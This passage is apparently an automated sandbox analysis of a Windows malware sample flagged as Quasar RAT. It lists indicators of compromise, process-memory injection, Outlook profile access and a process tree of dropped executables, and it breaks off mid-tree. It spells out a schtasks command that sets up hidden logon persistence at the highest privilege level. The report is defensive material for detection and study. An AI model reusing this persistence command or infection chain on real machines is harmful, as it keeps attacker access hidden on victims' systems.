\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={46D1E072-05E8-424B-81E4-41BBD7F0FDBC}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736790760" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133812643018308465" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 13 Jan 2025 17:52:40 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Modifies registry class 13 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ chrome.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9012 schtasks.exe 4436 schtasks.exe 4872 schtasks.exe 4288 schtasks.exe 2284 schtasks.exe 3844 schtasks.exe 8836 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3544 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 2576 build.exe 5520 chrome.exe 5520 chrome.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 1748 gem1.exe 5416 gem2.exe 5360 powershell.exe 5360 powershell.exe 5360 powershell.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 4100 dialer.exe 4100 dialer.exe 5416 gem2.exe 5416 gem2.exe 5416 gem2.exe 5892 Lightshot.exe 3888 powershell.exe 3888 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 852 7zFM.exe Token: 35 852 7zFM.exe Token: SeSecurityPrivilege 852 7zFM.exe Token: SeDebugPrivilege 3160 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 3664 ._cache_Synaptics.exe Token: SeDebugPrivilege 2972 voidware_loader.exe Token: SeDebugPrivilege 4688 DirectX111.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeShutdownPrivilege 3340 chrome.exe Token: SeCreatePagefilePrivilege 3340 chrome.exe Token: SeDebugPrivilege 2576 build.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeDebugPrivilege 1748 gem1.exe Token: SeImpersonatePrivilege 1748 gem1.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeDebugPrivilege 5360 powershell.exe Token: SeDebugPrivilege 4100 dialer.exe Token: SeShutdownPrivilege 6040 powercfg.exe Token: SeCreatePagefilePrivilege 6040 powercfg.exe Token: SeShutdownPrivilege 5320 powercfg.exe Token: SeCreatePagefilePrivilege 5320 powercfg.exe Token: SeShutdownPrivilege 1916 powercfg.exe Token: SeCreatePagefilePrivilege 1916 powercfg.exe Token: SeShutdownPrivilege 5520 chrome.exe Token: SeCreatePagefilePrivilege 5520 chrome.exe Token: SeShutdownPrivilege 5136 powercfg.exe Token: SeCreatePagefilePrivilege 5136 powercfg.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeShutdownPrivilege 316 dwm.exe Token: SeCreatePagefilePrivilege 316 dwm.exe Token: SeShutdownPrivilege 5520 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 852 7zFM.exe 852 7zFM.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 3520 Explorer.EXE 3520 Explorer.EXE 3520 Explorer.EXE 3520 Explorer.EXE 5520 chrome.exe 5520 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 3340 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 3520 Explorer.EXE 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe 5520 chrome.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 3544 EXCEL.EXE 6632 chrome.exe 7120 Conhost.exe 6280 Conhost.exe 6336 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 4164 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3424 wrote to memory of 3160 3424 New Text Document mod.exe 102 PID 3424 wrote to memory of 3160 3424 New Text Document mod.exe 102 PID 3424 wrote to memory of 2352 3424 New Text Document mod.exe 104 PID 3424 wrote to memory of 2352 3424 New Text Document mod.exe 104 PID 3424 wrote to memory of 2352 3424 New Text Document mod.exe 104 PID 2352 wrote to memory of 3664 2352 Synaptics.exe 106 PID 2352 wrote to memory of 3664 2352 Synaptics.exe 106 PID 3160 wrote to memory of 2972 3160 ._cache_New Text Document mod.exe 113 PID 3160 wrote to memory of 2972 3160 ._cache_New Text Document mod.exe 113 PID 3664 wrote to memory of 2576 3664 ._cache_Synaptics.exe 116 PID 3664 wrote to memory of 2576 3664 ._cache_Synaptics.exe 116 PID 3664 wrote to memory of 2576 3664 ._cache_Synaptics.exe 116 PID 2972 wrote to memory of 4436 2972 voidware_loader.exe 117 PID 2972 wrote to memory of 4436 2972 voidware_loader.exe 117 PID 2972 wrote to memory of 4688 2972 voidware_loader.exe 119 PID 2972 wrote to memory of 4688 2972 voidware_loader.exe 119 PID 3340 wrote to memory of 2272 3340 chrome.exe 122 PID 3340 wrote to memory of 2272 3340 chrome.exe 122 PID 4688 wrote to memory of 4872 4688 DirectX111.exe 124 PID 4688 wrote to memory of 4872 4688 DirectX111.exe 124 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 724 3340 chrome.exe 126 PID 3340 wrote to memory of 1152 3340 chrome.exe 127 PID 3340 wrote to memory of 1152 3340 chrome.exe 127 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 PID 3340 wrote to memory of 3616 3340 chrome.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 316 -s 40443⤵PID:7060
-
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4436
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1172
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3228
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1532
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2864
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1784
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2688
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2740
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3440
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3520 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:852
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Quasar RAT
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4604
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4436
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4872
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\Desktop\._cache_Synaptics.exe"C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate4⤵
